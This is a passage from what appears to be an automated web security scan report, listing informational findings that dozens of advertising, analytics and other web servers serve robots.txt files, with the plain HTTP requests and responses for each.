GET /robots.txt HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/plain
Content-Length: 26
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Expires: Mon, 25 Apr 2011 00:48:54 GMT
Pragma: no-cache
Date: Mon, 25 Apr 2011 00:48:54 GMT
Connection: close

User-agent: *
Disallow: /

29.23. http://c.betrad.com/a/n/273/79.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /a/n/273/79.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9152d7f1724ed8fbcd2e0c87029f193c:1276881254"
Last-Modified: Fri, 18 Jun 2010 17:14:14 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Sun, 24 Apr 2011 15:20:19 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

29.24. http://clickserve.us2.dartsearch.net/link/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clickserve.us2.dartsearch.net
Path:   /link/click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clickserve.us2.dartsearch.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 24 Apr 2011 19:52:44 GMT
Expires: Sun, 24 Apr 2011 19:52:44 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

# disallow all spiders
User-agent: *
Disallow: /

# allow the Google Adwords link checker
User-agent: AdsBot-Google
Disallow:

# allow the MSN Adcenter link checker
User-agent: MSNPTC
Disallow:


29.25. http://clients1.google.com/complete/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clients1.google.com
Path:   /complete/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sun, 24 Apr 2011 03:15:23 GMT
Expires: Sun, 24 Apr 2011 03:15:23 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.26. http://clk.atdmt.com/go/253732016/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/253732016/direct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Mon, 19 Oct 2009 19:29:35 GMT
Accept-Ranges: bytes
ETag: "4c95727df250ca1:0"
Date: Sun, 24 Apr 2011 12:33:04 GMT
Connection: close
Content-Length: 101

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

29.27. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 24 Apr 2011 03:22:41 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

29.28. http://consumerinfo.tt.omtrdc.net/m2/consumerinfo/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://consumerinfo.tt.omtrdc.net
Path:   /m2/consumerinfo/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: consumerinfo.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"25-1284655556000"
Accept-Ranges: bytes
Content-Length: 25
Date: Sun, 24 Apr 2011 19:54:34 GMT
Connection: close
Last-Modified: Thu, 16 Sep 2010 16:45:56 GMT
Server: Test & Target
Content-Type: text/plain

User-agent: *
Disallow: /

29.29. https://crm.infusionsoft.com/aff.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://crm.infusionsoft.com
Path:   /aff.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: crm.infusionsoft.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=922DC74D417263059ECB02B3EDF5B739; Path=/; Secure; HttpOnly
Content-Length: 240
Date: Mon, 25 Apr 2011 01:40:11 GMT
Connection: close

User-agent: *
Crawl-delay: 5
Sitemap: https://crm.infusionsoft.com/sitemap.xml
Allow: /cart/
Allow: /saleform/
Allow: /go/
Allow: /sitemap.xml
Allow: /sitemap.xsl
Disallow: /
Disallow: /cart/oneStepCh
...[SNIP]...

29.30. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Sun, 24 Apr 2011 16:35:04 GMT
Connection: close

# go away
User-agent: *
Disallow: /

29.31. http://d.w55c.net/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.w55c.net
Path:   /afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.w55c.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:39 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "27e081-131-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...

29.32. http://data.coremetrics.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.coremetrics.com
Path:   /cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:17 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "263cfe-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=995
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

29.33. http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/11377797616@x24

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dm.de.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:23:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:56:38 GMT
ETag: "204022b-1a-48822406d1980"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/;httponly

User-agent: *
Disallow: /

29.34. http://dogtime.com/ads/dtm/tp_support.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dogtime.com
Path:   /ads/dtm/tp_support.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dogtime.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 24 Apr 2011 16:45:58 GMT
Content-Type: text/plain
Content-Length: 4666
Last-Modified: Thu, 21 Apr 2011 18:39:19 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /signup
Disallow: /*/preview*
Disallow: /logout
Disallow: /login
Disallow: /discussion/forums/*/new
Disallow: /network_source/*
Disallow: /network/*
# Subdirs like badges and b
...[SNIP]...

29.35. http://ec.atdmt.com/ds/5RTLCLFLKLFL/v132_lockman/v132_lockman_v3_LockManSSCard_160x600.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /ds/5RTLCLFLKLFL/v132_lockman/v132_lockman_v3_LockManSSCard_160x600.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Expires: Sun, 01 May 2011 12:29:09 GMT
Date: Sun, 24 Apr 2011 12:29:09 GMT
Content-Type: text/plain
Content-Length: 68
Allow: GET
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

29.36. http://ehg-swisscom.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-swisscom.hitbox.com
Path:   /HG

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ehg-swisscom.hitbox.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:52 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Sun, 24 Apr 2011 19:52:52 GMT
Content-Type: text/plain
Content-Length: 36

User-agent: *
Disallow: /Diagnostic

29.37. http://equfx.netmng.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://equfx.netmng.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: equfx.netmng.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:53:28 GMT
Server: Apache/2.2.9
Last-Modified: Tue, 06 Apr 2010 14:04:58 GMT
ETag: "3d0003-1a-48391ee477680"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

29.38. http://equifax.com/free30daytrial/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://equifax.com
Path:   /free30daytrial/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: equifax.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 19:53:06 GMT
Content-length: 598
Content-type: text/plain
Last-modified: Tue, 04 Jan 2011 22:01:47 GMT
Accept-ranges: bytes
Connection: close

User-agent: *

Disallow: /uiTest/

Disallow: /siteAssets/

Disallow: /US/PSOL/

Disallow: /productDemos/debtStackingDemo.html
Disallow: /debtwiseoffer/

Sitemap: http://www.equifax.com/cs/S
...[SNIP]...

29.39. http://equifaxps.122.2o7.net/b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://equifaxps.122.2o7.net
Path:   /b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: equifaxps.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:55:19 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "2d9114-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www91
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

29.40. http://es.optimost.com/es/633/c/2/u/live.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.optimost.com
Path:   /es/633/c/2/u/live.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: es.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/plain
Content-Length: 26
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Date: Sun, 24 Apr 2011 03:32:23 GMT
Connection: close

User-agent: *
Disallow: /

29.41. http://evintl-aia.verisign.com/EVIntl2006.cer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://evintl-aia.verisign.com
Path:   /EVIntl2006.cer

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: evintl-aia.verisign.com

Response

HTTP/1.0 200 OK
Age: 3807
Date: Sun, 24 Apr 2011 02:38:32 GMT
Connection: Keep-Alive
Via: NS-248
ETag: "bfaf3-1a-c2189980"
Server: Apache/2.2.2 (Unix)
Last-Modified: Thu, 10 Nov 2005 00:05:10 GMT
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
X-Cache: HIT from hostname

User-agent: *
Disallow: /

29.42. http://exch.quantserve.com/pixel/p-03tSqaTFVs1ls.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exch.quantserve.com
Path:   /pixel/p-03tSqaTFVs1ls.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: exch.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 25 Apr 2011 12:37:02 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 24 Apr 2011 12:37:02 GMT
Server: QS

User-agent: *
Disallow: /

29.43. http://feeds.bbci.co.uk/news/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=3600
Expires: Sun, 24 Apr 2011 18:16:13 GMT
Date: Sun, 24 Apr 2011 17:16:13 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

29.44. http://feeds.delicious.com/v2/json/urlinfo/data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /v2/json/urlinfo/data

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.delicious.com

Response

HTTP/1.0 200 OK
Date: Sun, 24 Apr 2011 19:48:44 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=2592000
Expires: Tue, 24 May 2011 19:48:44 GMT
Last-Modified: Mon, 21 Mar 2011 16:19:33 GMT
Accept-Ranges: bytes
Content-Length: 1236
Content-Type: text/plain; charset=utf-8
Age: 0
Server: YTS/1.19.4

User-agent: *
Disallow: /

User-agent: delicious-thumbnails
Allow: /


User-agent: Slurp
Allow: /
Disallow: /inbox
Disallow: /subscriptions
Disallow: /network
Disallow: /search
Disallow: /post
Disall
...[SNIP]...

29.45. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 24 Apr 2011 12:09:49 GMT
Server: Floodlight server
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

29.46. http://gg.google.com/csi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gg.google.com
Path:   /csi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gg.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sun, 24 Apr 2011 16:50:11 GMT
Expires: Sun, 24 Apr 2011 16:50:11 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.47. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1047949563/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1047949563/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 24 Apr 2011 03:13:21 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

29.48. http://gravatar.com/avatar.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gravatar.com
Path:   /avatar.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gravatar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 17:07:15 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Accept-Ranges: bytes
Content-Length: 99
Vary: Accept-Encoding

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

29.49. http://i.xx.openx.com/942/9420ae6abc0b141cd8a7df1a2c5156db8f33f2a8/efb/efb89dc478c1e3ed5a981c61a2475ee4.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.xx.openx.com
Path:   /942/9420ae6abc0b141cd8a7df1a2c5156db8f33f2a8/efb/efb89dc478c1e3ed5a981c61a2475ee4.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i.xx.openx.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 16 Mar 2011 18:24:14 GMT
ETag: "1b9a7-130-49e9da6e62f80"
Accept-Ranges: bytes
Content-Length: 304
Content-Type: text/plain; charset=UTF-8
Date: Sun, 24 Apr 2011 15:19:40 GMT
Connection: close

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/images/). This file is required in the
# event that you use
...[SNIP]...

29.50. http://i35.tinypic.com/vx4ox.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i35.tinypic.com
Path:   /vx4ox.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i35.tinypic.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:44 GMT
Last-Modified: Tue, 23 Sep 2008 15:59:12 GMT
Content-Type: text/plain
ETag: "4d-3fad3400"
Accept-Ranges: bytes
Server: Apache
X-Cache: MISS from tinypic.com
Content-Length: 77
Connection: close

User-agent: *
Disallow: /language.php
Disallow: /track.php
Disallow: /ad.php

29.51. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_160x600.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:21:26 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1b1a-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

29.52. http://img.securepaynet.net/image.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.securepaynet.net
Path:   /image.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.securepaynet.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Tue, 25 Nov 2008 19:40:48 GMT
Accept-Ranges: bytes
ETag: "d53d3eb7354fc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Date: Sun, 24 Apr 2011 12:43:34 GMT
Connection: close
Content-Length: 53

# img.* robots.txt file
User-agent: *
Disallow: /

29.53. http://img1.wsimg.com/rcc/portraittemplates/img_resell_model_m2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img1.wsimg.com
Path:   /rcc/portraittemplates/img_resell_model_m2.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img1.wsimg.com

Response

HTTP/1.0 200 OK
Content-Length: 50
Content-Type: text/plain
Last-Modified: Thu, 04 Jun 2009 15:02:03 GMT
Accept-Ranges: bytes
ETag: "1eb1456b25e5c91:1072"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3888000
Date: Sun, 24 Apr 2011 12:42:06 GMT
Connection: close

#
# robots.txt
#
User-agent: *
Disallow: /
#

29.54. http://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img3.wsimg.com
Path:   /fastball/js_lib/FastballLibrary0005.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img3.wsimg.com

Response

HTTP/1.0 200 OK
Content-Length: 50
Content-Type: text/plain
Last-Modified: Thu, 04 Jun 2009 15:02:03 GMT
Accept-Ranges: bytes
ETag: "1eb1456b25e5c91:1072"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3888000
Date: Sun, 24 Apr 2011 12:42:05 GMT
Connection: close

#
# robots.txt
#
User-agent: *
Disallow: /
#

29.55. http://leadback.netseer.com/dsatserving2/servlet/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.netseer.com
Path:   /dsatserving2/servlet/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: leadback.netseer.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1284503052000"
Last-Modified: Tue, 14 Sep 2010 22:24:12 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 24 Apr 2011 03:13:16 GMT
Connection: close

User-agent: *
Disallow: /

29.56. http://leads.demandbase.com/in.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leads.demandbase.com
Path:   /in.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: leads.demandbase.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:47:18 GMT
Server: Apache
Last-Modified: Thu, 24 May 2007 00:06:48 GMT
ETag: "958da8-1f-4312c0f11f600"
Accept-Ranges: bytes
Content-Length: 31
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /stats/

29.57. http://linkhelp.clients.google.com/tbproxy/lh/wm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://linkhelp.clients.google.com
Path:   /tbproxy/lh/wm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: linkhelp.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sun, 24 Apr 2011 16:46:06 GMT
Expires: Sun, 24 Apr 2011 16:46:06 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.58. https://login.live.com/login.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.live.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 08 Mar 2011 00:55:39 GMT
Accept-Ranges: bytes
ETag: "8037ab8a2bddcb1:0"
Server: Microsoft-IIS/7.5
PPServer: PPV: 30 H: BAYIDSLGN1Q44 V: 0
Date: Sun, 24 Apr 2011 15:53:45 GMT
Connection: close
Content-Length: 27

User-agent: *
Disallow:

29.59. http://maps.google.com/maps/api/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/api/js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sun, 24 Apr 2011 16:46:13 GMT
Expires: Sun, 24 Apr 2011 16:46:13 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.60. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.googleapis.com
Path:   /maps/api/js/StaticMapService.GetMapImage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 09:42:43 GMT
Date: Sun, 24 Apr 2011 16:47:43 GMT
Expires: Sun, 24 Apr 2011 16:47:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 26
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

29.61. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.gstatic.com
Path:   /intl/en_us/mapfiles/openhand_8_8.cur

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.gstatic.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 23 Aug 2010 20:46:35 GMT
Date: Sun, 24 Apr 2011 16:47:53 GMT
Expires: Sun, 24 Apr 2011 16:47:53 GMT
Cache-Control: private, max-age=31536000
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.62. http://media.compete.com/downblouse.de_uv_460.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.compete.com
Path:   /downblouse.de_uv_460.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media.compete.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 23 Mar 2011 17:46:26 GMT
ETag: "1e8ad7-12a-f09ae080"
Accept-Ranges: bytes
Content-Length: 298
Content-Type: text/plain; charset=utf-8
Date: Sun, 24 Apr 2011 12:45:10 GMT
Connection: close

# Disallows all robots except those for major search sites
# http://www.robotstxt.org/wc/exclusion-admin.html


User-Agent: *
Disallow: /s/load_tags/
Disallow: /s/async/
Disallow: /metrics/async/
Disa
...[SNIP]...

29.63. https://membership.identitymonitor.citi.com/pages2/english/neworder.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://membership.identitymonitor.citi.com
Path:   /pages2/english/neworder.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: membership.identitymonitor.citi.com

Response

HTTP/1.1 200 OK
Content-Length: 103
Content-Type: text/plain
Last-Modified: Thu, 12 Mar 2009 21:57:44 GMT
Accept-Ranges: bytes
ETag: "0bc62925da3c91:2ad17"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 20:07:47 GMT
Connection: close

# For domain: membership.identitymonitor.citi.com

# Performics 02/26/09

User-agent:*
Disallow:/.

29.64. http://metrics.citibank.com/b/ss/prod/1/H.22.1/s0465555016417  previous  next

Summary

Severity:   Information
